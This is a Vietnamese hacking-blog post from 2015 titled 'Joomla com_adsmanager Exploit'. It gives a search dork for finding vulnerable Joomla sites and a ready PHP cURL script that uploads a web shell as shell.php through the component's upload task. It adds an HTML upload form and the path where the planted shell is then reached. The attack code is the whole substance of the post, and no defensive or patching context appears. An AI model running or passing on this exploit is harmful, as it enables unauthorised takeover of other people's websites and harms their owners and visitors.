• Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Backtrack
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
  • Tin tức
AnonyViet
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Backtrack
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
  • Tin tức
No Result
View All Result
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Backtrack
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
  • Tin tức
No Result
View All Result
AnonyViet
No Result
View All Result

Joomla com_adsmanager Exploit

AnonyViet by AnonyViet
20/12/2015
in SQL Injection
1
0
SHARES
Share on FacebookShare on Twitter

Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org

CODE PHP :

PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
 
$url = "site.com/index.php?option=com_adsmanager&task=upload&tmpl=component"; // put URL Here
$post = array
(
"file" => "@shell.jpg",
"name" => "shell.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, );
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, );
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
 
?>

#CSRF :

PHP
1
2
3
4
<form method="POST" action="TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

 

Các bài viết liên quan

Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất 13

Hướng dẫn cách phòng tránh Ransomware WannaCry chi tiết nhất

15/05/2017
Khai thác lỗ hổng WordPress Plugin WP-Dreamworkgallery 3

Khai thác lỗ hổng WordPress Plugin WP-Dreamworkgallery

03/04/2017
Hướng dẫn khai thác lỗi CMS Upload Website 2017 10

Bảo vệ: Hướng dẫn khai thác lỗi CMS Upload Website 2017

20/07/2018

Acces Shell: site.com/tmp/plupload/shell.php

Xem thêm:  SQLI Hunter v1.2 - Tự động tìm lỗi SQL Injection
Tags: exploitjoomla
Previous Post

XSS Vulnerability

 Next Post

Hướng dẫn Tạo tool hack disconect LoL

AnonyViet

AnonyViet

Kiến thức như một ngọn lửa, càng chia sẽ nó sẽ càng bùng cháy!

Related Posts

SQL Injection

SQLMap v1.2.9 – Công cụ khai thác lỗ hổng SQL Injection mạnh nhất

11/09/2018
Tool khai thác lỗi SQL Injection với SQLi Dumper v8.2 Full 8
SQL Injection

Tool khai thác lỗi SQL Injection với SQLi Dumper v8.2 Full

20/10/2017
Hướng dẫn code kiểm tra lỗ hổng bảo mật Sql Injection với Python script và cách phòng chống. 9
SQL Injection

Hướng dẫn code kiểm tra lỗ hổng bảo mật Sql Injection với Python script và cách phòng chống.

21/06/2017
SQLI Hunter v1.2 - Tự động tìm lỗi SQL Injection
SQL Injection

SQLI Hunter v1.2 – Tự động tìm lỗi SQL Injection

27/12/2015
Dork SQL 2015
SQL Injection

Dork SQL 2015

21/12/2015
Havij 1.17 PRO 1
SQL Injection

Havij 1.17 PRO

20/12/2015
Next Post
Hướng dẫn Tạo tool hack disconect LoL

Hướng dẫn Tạo tool hack disconect LoL

1
Để lại bình luận

avatar
1 Comment threads
0 Thread replies
0 Followers
 
Most reacted comment
Hottest comment thread
1 Comment authors
Lâm Trung Tính Recent comment authors
avatar

Website này sử dụng Akismet để hạn chế spam. Tìm hiểu bình luận của bạn được duyệt như thế nào.

newest oldest
Lâm Trung Tính | <span class="wpdiscuz-comment-count">948 comments</span>
Lâm Trung Tính | 948 comments

Nguyễn Lam để đây không biết chừng nào tới đây..hi..hi

Reply
12/06/2017 10:49 sáng

Liên hệ quảng cáo

Liên hệ quảng cáo

Đối tác

Liên hệ quảng cáo




Các bài mới

Share Ký Tự Tiểu Sử Màu Facebook đẹp trên Facebook Lite

25/04/2019
trick javascript

Cách thay đổi nội dung Website bất kỳ nào với 1 dòng Code

25/04/2019

Tut Unlock Mạo danh Facebook khi bị Report 2019

23/04/2019

Cách tạo Link ẩn khi đăng Status hoặc Comment Facebook

22/04/2019

Cách thêm bài hát yêu thích vào trang cá nhân Facebook trên điện thoại

20/04/2019

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Bạn bè

Anonymousvn  – LoliTeam – Ai sẽ là người bạn tiếp theo của AnonyViet?

Liên hệ

Email: anonyviet.com[@]gmail.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

Bài viết mới

  • Share Ký Tự Tiểu Sử Màu Facebook đẹp trên Facebook Lite
  • Cách thay đổi nội dung Website bất kỳ nào với 1 dòng Code
  • Tut Unlock Mạo danh Facebook khi bị Report 2019
  • Cách tạo Link ẩn khi đăng Status hoặc Comment Facebook
  • Cách thêm bài hát yêu thích vào trang cá nhân Facebook trên điện thoại
  • Một số kinh nghiệm kiếm tiền từ Ad Breaks của Facebook
  • Giới thiệu về AnonyViet
  • Liên hệ Quảng cáo
  • Privacy & Policy
  • Contact

© 2019 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ.

No Result
View All Result
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • DDOS
    • Kali Linux / Backtrack
    • SQL Injection
    • Virus-Trojan-Rat
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
  • Tin tức

© 2019 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ.

wpDiscuz